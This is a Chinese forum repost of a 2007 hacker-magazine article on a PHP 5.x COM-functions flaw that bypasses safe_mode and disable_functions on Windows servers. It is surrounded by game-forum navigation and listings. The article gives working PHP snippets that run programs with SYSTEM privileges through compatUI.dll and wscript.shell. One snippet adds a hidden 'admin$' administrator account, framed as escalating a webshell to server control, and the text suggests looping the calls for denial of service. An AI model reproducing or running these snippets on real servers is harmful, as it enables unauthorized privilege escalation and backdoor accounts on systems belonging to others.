设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
PHP5.xCOMfunctions提权漏洞的利用分析
返回列表
发新帖
PHP5.xCOMfunctions提权漏洞的利用分析
[复制链接]
332
|
0
|
2012-4-1 19:18:27
|
显示全部楼层
|
阅读模式
本篇文章源自《黑客防线》2007年12月刊
================================nbsp; 
HP是英文“超级文本预处理语言”(HypertextPreprocessor)的缩写,是一种HTML内嵌式的语言。它可以比CGI或者Perl更快速地执行动态网页。PHP具有非常强大的功能,所有的CGI或者JavaScript的功能,PHP都能实现,支持几乎所有流行的数据库以及操作系统。 近期功能如此强大、运用如此广泛的PHP却出现了重大漏洞,也就是PHP5.xCOMfunctionssafe_modeanddisable_functionbypass漏洞。它可以实现提权,这是很多朋友们所梦寐以求的。下面我们先来总体介绍一下漏洞,由于本人水平有限,请大家原谅不准确的地方。 漏洞所用到的COM函数只在Windows环境下的PHP才存在,.net的支持需要PHP5以及.netRuntime。漏洞所利用的函数无需特殊安装,是PHP内核的一部分。Windows环境下的PHP默认支持这些扩展,不用额外加载其他扩展来调用漏洞函数。 现在部分大中型网站都喜欢用PHP+Apache+Windows来架设,这样的话,PHP漏洞的打击面就会很大了,特别是在现在提权越来越难的形势下,我想,很多服务器会因为这个漏洞而沦陷的。根据漏洞发现者公布的内容,漏洞的利用要求php.ini中有如下设置。我的测试环境为PHP5.2.3+Apache2.2.3+WindowsXPSP2,在我的测试当中,发现并不一定要严格按照这样配置,大家可以自己测试一下看看。
safe_mode=On
disable_functions=com_load_typelib
open_basedir=htdocs
下面我们就逐一看看这个漏洞的内容与利用。
compatUI.dll中的RunApplication函数
这个漏洞的测试代码如下。
<?php
$compatUI=newCOM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
//加载compatUI.dll $compatUI->RunApplication("something","notepad.exe",1);
//运行记事本
?>
将其保存为PHP文件,放到服务器上,然后用IE访问就可以了。运行后IE是没有什么回显的,1所示,但实际上记事本已经运行了,而且是SYSTEM权限,因为它是由系统服务来运行的,所以继承了SYSTEM权限,2所示。
利用这个漏洞,我们可以运行已经上传好的木马,实现WebShell的提权。当然,如果你足够无聊的话,还可以写成循环,让服务器运行很多记事本,实现D.O.S。
Wscript运行命令
这个漏洞的测试代码如下。
<?php
$wscript=newCOM('wscript.shell');//要用到wscript.exe
$wscript->Run("cmd.exe/ccalc.exe");//运行calc.exe
?>
访问该脚本后,服务器上出现了SYSTEM权限的calc.exe进程,3所示。我们只要发挥一下想象力,修改一下脚本,就能加个管理员账户了,具体代码如下。
<?php
$wscript=newCOM('wscript.shell');$wscript->Run("cmd.exe/cnetuseradmin$/add");
$wscript->Run("cmd.exe/cnetlocalgroupadministratorsadmin$/add");
?>
访问该脚本之后,即可添加管理员成功,这对SYSTEM权限来说简直就是噩梦,4所示。
*
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
飞尔
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)